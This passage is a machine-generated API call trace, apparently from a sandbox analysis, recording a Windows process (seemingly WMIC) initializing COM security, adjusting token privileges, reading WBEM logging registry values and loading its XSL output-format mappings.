returned 0x285a50 [0125.017] malloc (_Size=0x70) returned 0x285a90 [0125.017] malloc (_Size=0x50) returned 0x287d30 [0125.017] malloc (_Size=0x30) returned 0x287d90 [0125.017] malloc (_Size=0x48) returned 0x287dd0 [0125.017] malloc (_Size=0x30) returned 0x287e20 [0125.017] malloc (_Size=0x30) returned 0x287e60 [0125.017] ??0CHString@@QEAA@XZ () returned 0xffe62f58 [0125.017] malloc (_Size=0x30) returned 0x287ea0 [0125.017] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0125.017] SetConsoleCtrlHandler (HandlerRoutine=0xffe35724, Add=1) returned 1 [0125.018] _onexit (_Func=0xffe4f378) returned 0xffe4f378 [0125.018] _onexit (_Func=0xffe4f490) returned 0xffe4f490 [0125.018] _onexit (_Func=0xffe4f4d0) returned 0xffe4f4d0 [0125.018] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0125.018] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0125.021] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0125.027] CoCreateInstance (in: rclsid=0xffdf73a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xffdf7370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xffe62940 | out: ppv=0xffe62940*=0x1d91390) returned 0x0 [0125.033] GetCurrentProcess () returned 0xffffffffffffffff [0125.033] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x1cf8c0 | out: TokenHandle=0x1cf8c0*=0xf4) returned 1 [0125.033] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1cf8b8 | out: TokenInformation=0x0, ReturnLength=0x1cf8b8) returned 0 [0125.033] malloc (_Size=0x118) returned 0x2869a0 [0125.033] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x2869a0, TokenInformationLength=0x118, ReturnLength=0x1cf8b8 | out: TokenInformation=0x2869a0, ReturnLength=0x1cf8b8) returned 1 [0125.033] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x2869a0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=993197543, Attributes=0x755b), (Luid.LowPart=0x0, Luid.HighPart=2653920, Attributes=0x0), (Luid.LowPart=0x64006e, Luid.HighPart=7798895, Attributes=0x3b0073), (Luid.LowPart=0x57005c, Luid.HighPart=7209065, Attributes=0x6f0064), (Luid.LowPart=0x53005c, Luid.HighPart=7536761, Attributes=0x650074), (Luid.LowPart=0x5c0032, Luid.HighPart=6422615, Attributes=0x6d0065))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0125.033] free (_Block=0x2869a0) [0125.033] CloseHandle (hObject=0xf4) returned 1 [0125.033] malloc (_Size=0x40) returned 0x287ee0 [0125.033] malloc (_Size=0x40) returned 0x287f30 [0125.033] malloc (_Size=0x40) returned 0x287f80 [0125.033] malloc (_Size=0x20a) returned 0x2869a0 [0125.033] GetSystemDirectoryW (in: lpBuffer=0x2869a0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0125.033] free (_Block=0x2869a0) [0125.033] malloc (_Size=0x18) returned 0x40dfb0 [0125.033] malloc (_Size=0x18) returned 0x2869a0 [0125.034] malloc (_Size=0x18) returned 0x2869c0 [0125.034] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0125.034] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0125.034] free (_Block=0x40dfb0) [0125.034] free (_Block=0x2869a0) [0125.034] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77940000 [0125.034] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0125.034] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0125.034] FreeLibrary (hLibModule=0x77940000) returned 1 [0125.034] free (_Block=0x2869c0) [0125.034] _vsnwprintf (in: _Buffer=0x287f80, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x1cf4e8 | out: _Buffer="ms_409") returned 6 [0125.034] malloc (_Size=0x20) returned 0x2869a0 [0125.034] GetComputerNameW (in: lpBuffer=0x2869a0, nSize=0x1cf8c0 | out: lpBuffer="XDUWTFONO", nSize=0x1cf8c0) returned 1 [0125.035] lstrlenW (lpString="XDUWTFONO") returned 9 [0125.035] malloc (_Size=0x14) returned 0x40dfb0 [0125.035] lstrlenW (lpString="XDUWTFONO") returned 9 [0125.035] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x1cf8b8 | out: lpNameBuffer=0x0, nSize=0x1cf8b8) returned 0x7fffffde000 [0125.035] GetLastError () returned 0xea [0125.036] malloc (_Size=0x40) returned 0x2869d0 [0125.036] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2869d0, nSize=0x1cf8b8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cf8b8) returned 0x1 [0125.036] lstrlenW (lpString="") returned 0 [0125.036] lstrlenW (lpString="XDUWTFONO") returned 9 [0125.036] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0125.037] lstrlenW (lpString=".") returned 1 [0125.037] lstrlenW (lpString="XDUWTFONO") returned 9 [0125.037] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0125.037] lstrlenW (lpString="LOCALHOST") returned 9 [0125.037] lstrlenW (lpString="XDUWTFONO") returned 9 [0125.037] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0125.037] lstrlenW (lpString="XDUWTFONO") returned 9 [0125.037] lstrlenW (lpString="XDUWTFONO") returned 9 [0125.037] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0125.037] free (_Block=0x40dfb0) [0125.037] lstrlenW (lpString="XDUWTFONO") returned 9 [0125.037] malloc (_Size=0x14) returned 0x40dfb0 [0125.037] lstrlenW (lpString="XDUWTFONO") returned 9 [0125.037] lstrlenW (lpString="XDUWTFONO") returned 9 [0125.037] malloc (_Size=0x14) returned 0x286a20 [0125.037] lstrlenW (lpString="XDUWTFONO") returned 9 [0125.037] malloc (_Size=0x8) returned 0x286a40 [0125.037] malloc (_Size=0x18) returned 0x286a60 [0125.037] malloc (_Size=0x30) returned 0x286a80 [0125.037] malloc (_Size=0x18) returned 0x286ac0 [0125.038] SysStringLen (param_1="IDENTIFY") returned 0x8 [0125.038] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0125.038] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0125.038] SysStringLen (param_1="IDENTIFY") returned 0x8 [0125.038] malloc (_Size=0x30) returned 0x286ae0 [0125.038] malloc (_Size=0x18) returned 0x286b20 [0125.038] SysStringLen (param_1="IMPERSONATE") returned 0xb [0125.038] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0125.038] SysStringLen (param_1="IMPERSONATE") returned 0xb [0125.038] SysStringLen (param_1="IDENTIFY") returned 0x8 [0125.038] SysStringLen (param_1="IDENTIFY") returned 0x8 [0125.038] SysStringLen (param_1="IMPERSONATE") returned 0xb [0125.038] malloc (_Size=0x30) returned 0x286b40 [0125.038] malloc (_Size=0x18) returned 0x286b80 [0125.038] SysStringLen (param_1="DELEGATE") returned 0x8 [0125.038] SysStringLen (param_1="IDENTIFY") returned 0x8 [0125.038] SysStringLen (param_1="DELEGATE") returned 0x8 [0125.038] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0125.038] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0125.038] SysStringLen (param_1="DELEGATE") returned 0x8 [0125.038] malloc (_Size=0x30) returned 0x286ba0 [0125.038] malloc (_Size=0x18) returned 0x286be0 [0125.038] malloc (_Size=0x30) returned 0x286c00 [0125.038] malloc (_Size=0x18) returned 0x286c40 [0125.038] SysStringLen (param_1="NONE") returned 0x4 [0125.038] SysStringLen (param_1="DEFAULT") returned 0x7 [0125.038] SysStringLen (param_1="DEFAULT") returned 0x7 [0125.038] SysStringLen (param_1="NONE") returned 0x4 [0125.038] malloc (_Size=0x30) returned 0x286c60 [0125.039] malloc (_Size=0x18) returned 0x286ca0 [0125.039] SysStringLen (param_1="CONNECT") returned 0x7 [0125.039] SysStringLen (param_1="DEFAULT") returned 0x7 [0125.039] malloc (_Size=0x30) returned 0x286cc0 [0125.039] malloc (_Size=0x18) returned 0x286d00 [0125.039] SysStringLen (param_1="CALL") returned 0x4 [0125.039] SysStringLen (param_1="DEFAULT") returned 0x7 [0125.039] SysStringLen (param_1="CALL") returned 0x4 [0125.039] SysStringLen (param_1="CONNECT") returned 0x7 [0125.039] malloc (_Size=0x30) returned 0x286d20 [0125.039] malloc (_Size=0x18) returned 0x286d60 [0125.039] SysStringLen (param_1="PKT") returned 0x3 [0125.039] SysStringLen (param_1="DEFAULT") returned 0x7 [0125.039] SysStringLen (param_1="PKT") returned 0x3 [0125.039] SysStringLen (param_1="NONE") returned 0x4 [0125.039] SysStringLen (param_1="NONE") returned 0x4 [0125.039] SysStringLen (param_1="PKT") returned 0x3 [0125.039] malloc (_Size=0x30) returned 0x286d80 [0125.039] malloc (_Size=0x18) returned 0x286dc0 [0125.039] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0125.039] SysStringLen (param_1="DEFAULT") returned 0x7 [0125.039] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0125.039] SysStringLen (param_1="NONE") returned 0x4 [0125.039] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0125.039] SysStringLen (param_1="PKT") returned 0x3 [0125.039] SysStringLen (param_1="PKT") returned 0x3 [0125.039] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0125.039] malloc (_Size=0x30) returned 0x288000 [0125.040] malloc (_Size=0x18) returned 0x286de0 [0125.040] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0125.040] SysStringLen (param_1="DEFAULT") returned 0x7 [0125.040] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0125.040] SysStringLen (param_1="PKT") returned 0x3 [0125.040] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0125.040] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0125.040] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0125.040] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0125.040] malloc (_Size=0x30) returned 0x288040 [0125.040] malloc (_Size=0x40) returned 0x286e00 [0125.040] malloc (_Size=0x20a) returned 0x286e50 [0125.040] GetSystemDirectoryW (in: lpBuffer=0x286e50, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0125.040] free (_Block=0x286e50) [0125.040] malloc (_Size=0x18) returned 0x286e50 [0125.040] malloc (_Size=0x18) returned 0x286e70 [0125.040] malloc (_Size=0x18) returned 0x286e90 [0125.040] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0125.040] SysStringLen (param_1="\\wbem\\") returned 0x6 [0125.040] free (_Block=0x286e50) [0125.041] free (_Block=0x286e70) [0125.041] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0125.041] free (_Block=0x286e90) [0125.041] malloc (_Size=0x18) returned 0x286e50 [0125.041] malloc (_Size=0x18) returned 0x286e70 [0125.041] malloc (_Size=0x18) returned 0x286e90 [0125.041] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0125.041] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0125.041] free (_Block=0x286e50) [0125.041] free (_Block=0x286e70) [0125.041] GetCurrentThreadId () returned 0xa10 [0125.041] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x1cf1c0 | out: phkResult=0x1cf1c0*=0xf8) returned 0x0 [0125.041] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x1cf210, lpcbData=0x1cf1b0*=0x400 | out: lpType=0x0, lpData=0x1cf210*=0x30, lpcbData=0x1cf1b0*=0x4) returned 0x0 [0125.041] _wcsicmp (_String1="0", _String2="1") returned -1 [0125.041] _wcsicmp (_String1="0", _String2="2") returned -2 [0125.041] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1cf1b0*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x1cf1b0*=0x42) returned 0x0 [0125.041] malloc (_Size=0x86) returned 0x286eb0 [0125.041] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x286eb0, lpcbData=0x1cf1b0*=0x42 | out: lpType=0x0, lpData=0x286eb0*=0x25, lpcbData=0x1cf1b0*=0x42) returned 0x0 [0125.041] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0125.041] malloc (_Size=0x42) returned 0x286f40 [0125.042] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0125.042] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x1cf210, lpcbData=0x1cf1b0*=0x400 | out: lpType=0x0, lpData=0x1cf210*=0x36, lpcbData=0x1cf1b0*=0xc) returned 0x0 [0125.042] _wtol (_String="65536") returned 65536 [0125.042] free (_Block=0x286eb0) [0125.042] RegCloseKey (hKey=0x0) returned 0x6 [0125.042] CoCreateInstance (in: rclsid=0xffdf7410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xffdf73f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x1cf6b8 | out: ppv=0x1cf6b8*=0x1d71d0) returned 0x0 [0125.058] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x1d71d0, xmlSource=0x1cf800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x286e50), isSuccessful=0x1cf870 | out: isSuccessful=0x1cf870*=0xffff) returned 0x0 [0125.159] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x1d71d0, DOMElement=0x1cf6b0 | out: DOMElement=0x1cf6b0) returned 0x0 [0125.159] malloc (_Size=0x18) returned 0x286e50 [0125.159] free (_Block=0x286e50) [0125.159] malloc (_Size=0x18) returned 0x286e50 [0125.159] free (_Block=0x286e50) [0125.159] malloc (_Size=0x18) returned 0x286e50 [0125.160] malloc (_Size=0x18) returned 0x286e70 [0125.160] malloc (_Size=0x30) returned 0x288080 [0125.160] malloc (_Size=0x18) returned 0x286eb0 [0125.160] free (_Block=0x286eb0) [0125.160] malloc (_Size=0x18) returned 0x28c560 [0125.160] malloc (_Size=0x18) returned 0x28c580 [0125.160] SysStringLen (param_1="VALUE") returned 0x5 [0125.160] SysStringLen (param_1="TABLE") returned 0x5 [0125.160] SysStringLen (param_1="TABLE") returned 0x5 [0125.160] SysStringLen (param_1="VALUE") returned 0x5 [0125.160] malloc (_Size=0x30) returned 0x2880c0 [0125.160] malloc (_Size=0x18) returned 0x28c5a0 [0125.161] free (_Block=0x28c5a0) [0125.161] malloc (_Size=0x18) returned 0x28c5a0 [0125.161] malloc (_Size=0x18) returned 0x28c5c0 [0125.161] SysStringLen (param_1="LIST") returned 0x4 [0125.161] SysStringLen (param_1="TABLE") returned 0x5 [0125.161] malloc (_Size=0x30) returned 0x288100 [0125.161] malloc (_Size=0x18) returned 0x28c5e0 [0125.161] free (_Block=0x28c5e0) [0125.161] malloc (_Size=0x18) returned 0x28c5e0 [0125.161] malloc (_Size=0x18) returned 0x28c600 [0125.161] SysStringLen (param_1="RAWXML") returned 0x6 [0125.161] SysStringLen (param_1="TABLE") returned 0x5 [0125.161] SysStringLen (param_1="RAWXML") returned 0x6 [0125.161] SysStringLen (param_1="LIST") returned 0x4 [0125.161] SysStringLen (param_1="LIST") returned 0x4 [0125.161] SysStringLen (param_1="RAWXML") returned 0x6 [0125.161] malloc (_Size=0x30) returned 0x288140 [0125.162] malloc (_Size=0x18) returned 0x28c620 [0125.162] free (_Block=0x28c620) [0125.162] malloc (_Size=0x18) returned 0x28c620 [0125.162] malloc (_Size=0x18) returned 0x28c640 [0125.162] SysStringLen (param_1="HTABLE") returned 0x6 [0125.162] SysStringLen (param_1="TABLE") returned 0x5 [0125.162] SysStringLen (param_1="HTABLE") returned 0x6 [0125.162] SysStringLen (param_1="LIST") returned 0x4 [0125.162] malloc (_Size=0x30) returned 0x288180 [0125.162] malloc (_Size=0x18) returned 0x28c660 [0125.162] free (_Block=0x28c660) [0125.162] malloc (_Size=0x18) returned 0x28c660 [0125.162] malloc (_Size=0x18) returned 0x28c680 [0125.162] SysStringLen (param_1="HFORM") returned 0x5 [0125.162] SysStringLen (param_1="TABLE") returned 0x5 [0125.162] SysStringLen (param_1="HFORM") returned 0x5 [0125.162] SysStringLen (param_1="LIST") returned 0x4 [0125.163] SysStringLen (param_1="HFORM") returned 0x5 [0125.163] SysStringLen (param_1="HTABLE") returned 0x6 [0125.163] malloc (_Size=0x30) returned 0x2881c0 [0125.163] malloc (_Size=0x18) returned 0x28c6a0 [0125.163] free (_Block=0x28c6a0) [0125.163] malloc (_Size=0x18) returned 0x28c6a0 [0125.163] malloc (_Size=0x18) returned 0x28c6c0 [0125.163] SysStringLen (param_1="XML") returned 0x3 [0125.163] SysStringLen (param_1="TABLE") returned 0x5 [0125.163] SysStringLen (param_1="XML") returned 0x3 [0125.163] SysStringLen (param_1="VALUE") returned 0x5 [0125.163] SysStringLen (param_1="VALUE") returned 0x5 [0125.163] SysStringLen (param_1="XML") returned 0x3 [0125.163] malloc (_Size=0x30) returned 0x288200 [0125.163] malloc (_Size=0x18) returned 0x28c6e0 [0125.163] free (_Block=0x28c6e0) [0125.164] malloc (_Size=0x18) returned 0x28c6e0 [0125.164] malloc (_Size=0x18) returned 0x28c700 [0125.164] SysStringLen (param_1="MOF") returned 0x3 [0125.164] SysStringLen (param_1="TABLE") returned 0x5 [0125.164] SysStringLen (param_1="MOF") returned 0x3 [0125.164] SysStringLen (param_1="LIST") returned 0x4 [0125.164] SysStringLen (param_1="MOF") returned 0x3 [0125.164] SysStringLen (param_1="RAWXML") returned 0x6 [0125.164] SysStringLen (param_1="LIST") returned 0x4 [0125.164] SysStringLen (param_1="MOF") returned 0x3 [0125.164] malloc (_Size=0x30) returned 0x288240 [0125.164] malloc (_Size=0x18) returned 0x28c720 [0125.164] free (_Block=0x28c720) [0125.164] malloc (_Size=0x18) returned 0x28c720 [0125.164] malloc (_Size=0x18) returned 0x28c740 [0125.164] SysStringLen (param_1="CSV") returned 0x3 [0125.164] SysStringLen (param_1="TABLE") returned 0x5 [0125.164] SysStringLen (param_1="CSV") returned 0x3 [0125.164] SysStringLen (param_1="LIST") returned 0x4 [0125.164] SysStringLen (param_1="CSV") returned 0x3 [0125.164] SysStringLen (param_1="HTABLE") returned 0x6 [0125.164] SysStringLen (param_1="CSV") returned 0x3 [0125.164] SysStringLen (param_1="HFORM") returned 0x5 [0125.165] malloc (_Size=0x30) returned 0x288280 [0125.165] malloc (_Size=0x18) returned 0x28c760 [0125.165] free (_Block=0x28c760) [0125.165] malloc (_Size=0x18) returned 0x28c760 [0125.165] malloc (_Size=0x18) returned 0x28c780 [0125.165] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0125.165] SysStringLen (param_1="TABLE") returned 0x5 [0125.165] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0125.165] SysStringLen (param_1="VALUE") returned 0x5 [0125.165] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0125.165] SysStringLen (param_1="XML") returned 0x3 [0125.165] SysStringLen (param_1="XML") returned 0x3 [0125.165] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0125.165] malloc (_Size=0x30) returned 0x2882c0 [0125.165] malloc (_Size=0x18) returned 0x28c7a0 [0125.165] free (_Block=0x28c7a0) [0125.165] malloc (_Size=0x18) returned 0x28c7a0 [0125.166] malloc (_Size=0x18) returned 0x28c7c0 [0125.166] SysStringLen (param_1="texttablewsys") returned 0xd [0125.166] SysStringLen (param_1="TABLE") returned 0x5 [0125.166] SysStringLen (param_1="texttablewsys") returned 0xd [0125.166] SysStringLen (param_1="XML") returned 0x3 [0125.166] SysStringLen (param_1="texttablewsys") returned 0xd [0125.166] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0125.166] SysStringLen (param_1="XML") returned 0x3 [0125.166] SysStringLen (param_1="texttablewsys") returned 0xd [0125.166] malloc (_Size=0x30) returned 0x288300 [0125.166] malloc (_Size=0x18) returned 0x28c7e0 [0125.166] free (_Block=0x28c7e0) [0125.166] malloc (_Size=0x18) returned 0x28c7e0 [0125.166] malloc (_Size=0x18) returned 0x28c800 [0125.166] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0125.166] SysStringLen (param_1="TABLE") returned 0x5 [0125.166] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0125.166] SysStringLen (param_1="XML") returned 0x3 [0125.166] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0125.166] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0125.166] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0125.166] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0125.166] malloc (_Size=0x30) returned 0x288340 [0125.167] malloc (_Size=0x18) returned 0x28c820 [0125.167] free (_Block=0x28c820) [0125.167] malloc (_Size=0x18) returned 0x28c820 [0125.167] malloc (_Size=0x18) returned 0x28c840 [0125.167] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0125.167] SysStringLen (param_1="TABLE") returned 0x5 [0125.167] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0125.167] SysStringLen (param_1="XML") returned 0x3 [0125.167] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0125.167] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0125.167] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0125.167] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0125.167] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0125.167] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0125.167] malloc (_Size=0x30) returned 0x288380 [0125.167] malloc (_Size=0x18) returned 0x28c860 [0125.168] free (_Block=0x28c860) [0125.168] malloc (_Size=0x18) returned 0x28c860 [0125.168] malloc (_Size=0x18) returned 0x28c880 [0125.168] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0125.168] SysStringLen (param_1="TABLE") returned 0x5 [0125.168] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0125.168] SysStringLen (param_1="XML") returned 0x3 [0125.168] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0125.168] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0125.168] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0125.168] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0125.168] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0125.168] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0125.168] malloc (_Size=0x30) returned 0x2883c0 [0125.168] malloc (_Size=0x18) returned 0x28c8a0 [0125.168] free (_Block=0x28c8a0) [0125.168] malloc (_Size=0x18) returned 0x28c8a0 [0125.168] malloc (_Size=0x18) returned 0x28c8c0 [0125.168] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0125.168] SysStringLen (param_1="TABLE") returned 0x5 [0125.168] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0125.168] SysStringLen (param_1="XML") returned 0x3 [0125.168] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0125.169] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0125.169] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0125.169] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0125.169] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0125.169] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0125.169] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0125.169] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0125.169] malloc (_Size=0x30) returned 0x288400 [0125.169] malloc (_Size=0x18) returned 0x28c8e0 [0125.169] free (_Block=0x28c8e0) [0125.169] malloc (_Size=0x18) returned 0x28c8e0 [0125.169] malloc (_Size=0x18) returned 0x28c900 [0125.169] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0125.169] SysStringLen (param_1="TABLE") returned 0x5 [0125.169] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0125.169] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0125.169] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0125.169] SysStringLen (param_1="XML") returned 0x3 [0125.169] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0125.169] SysStringLen (param_1="texttablewsys") returned 0xd [0125.169] SysStringLen (param_1="XML") returned 0x3 [0125.169] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0125.169] malloc (_Size=0x30) returned 0x288440 [0125.170] malloc (_Size=0x18) returned 0x28c920 [0125.170] free (_Block=0x28c920) [0125.170] malloc (_Size=0x18) returned 0x28c920 [0125.170] malloc (_Size=0x18) returned 0x28c940 [0125.170] SysStringLen (param_1="htable-sortby") returned 0xd [0125.170] SysStringLen (param_1="TABLE") returned 0x5 [0125.170] SysStringLen (param_1="htable-sortby") returned 0xd [0125.170] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0125.170] SysStringLen (param_1="htable-sortby") returned 0xd [0125.170] SysStringLen (param_1="XML") returned 0x3 [0125.170] SysStringLen (param_1="htable-sortby") returned 0xd [0125.170] SysStringLen (param_1="texttablewsys") returned 0xd [0125.170] SysStringLen (param_1="htable-sortby") returned 0xd [0125.170] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0125.170] SysStringLen (param_1="XML") returned 0x3 [0125.170] SysStringLen (param_1="htable-sortby") returned 0xd [0125.170] malloc (_Size=0x30) returned 0x288480 [0125.170] malloc (_Size=0x18) returned 0x28c960 [0125.170] free (_Block=0x28c960) [0125.171] malloc (_Size=0x18) returned 0x28c960 [0125.171] malloc (_Size=0x18) returned 0x28c980 [0125.171] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0125.171] SysStringLen (param_1="TABLE") returned 0x5 [0125.171] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0125.171] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0125.171] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0125.171] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0125.171] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0125.171] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0125.171] SysStringLen 